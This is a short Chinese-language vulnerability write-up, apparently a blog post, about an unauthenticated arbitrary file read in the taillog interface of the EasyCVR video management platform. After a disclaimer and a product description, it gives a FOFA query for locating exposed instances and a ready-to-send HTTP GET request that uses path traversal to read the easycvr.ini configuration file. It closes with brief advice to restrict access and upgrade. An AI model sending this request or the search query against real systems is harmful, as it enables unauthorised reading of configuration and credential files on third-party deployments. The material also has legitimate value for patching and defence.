免费声明
本文所包含的 Proof of Concept (POC) 旨在提供有关特定漏洞的技术分析与研究信息,目的是提升网络安全意识并促进技术进步。请注意,未经授权访问或攻击系统、网络、应用程序可能违反法律法规并带来严重后果。
作者明确声明,不对读者基于本文内容所采取的任何行为承担责任。使用本文信息时,读者必须严格遵守适用的法律法规、服务协议以及道德准则,自行承担由此引发的一切风险和责任。
如您认为本文内容涉及侵权或其他问题,请立即与我们联系。我们将迅速调查,并根据需要删除相关内容。
1. 产品简介
EasyCVR视频管理平台,作为TSINGSEE青犀视频旗下的一款重要产品,是一款功能强大的视频融合+AI智能分析网关平台。平台基于分布式、负载均衡等流媒体技术,提供广泛兼容、安全可靠、开放共享的视频综合服务。它支持多协议的设备视频接入、采集、AI智能检测、处理、分发、管理等服务,并具备轻量化接入、传输、处理与分发能力,可实现一站式视频融合共享管理。支持RTSP、RTMP、GB28181、GB35114、海康Ehome、大华SDK、海康SDK等多种协议的视频设备接入,兼容市面上几乎所有视频终端。
2. 漏洞概述
EasyCVR-视频管理平台 taillog 接口存在任意文件读取漏洞,未经身份验证攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
3. 复现环境
FOFA: (body="EasyGBS" || body = "EasyDarwin.Body" || body="EasyCVR") && (title="" || title= "EasyCVR")
4. 漏洞复现
PoC
GET /taillog/oxsecl/..\easycvr.ini HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
0x05 修复建议
关闭互联网暴露面或接口设置访问权限
升级至安全版本
扫一扫
967
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
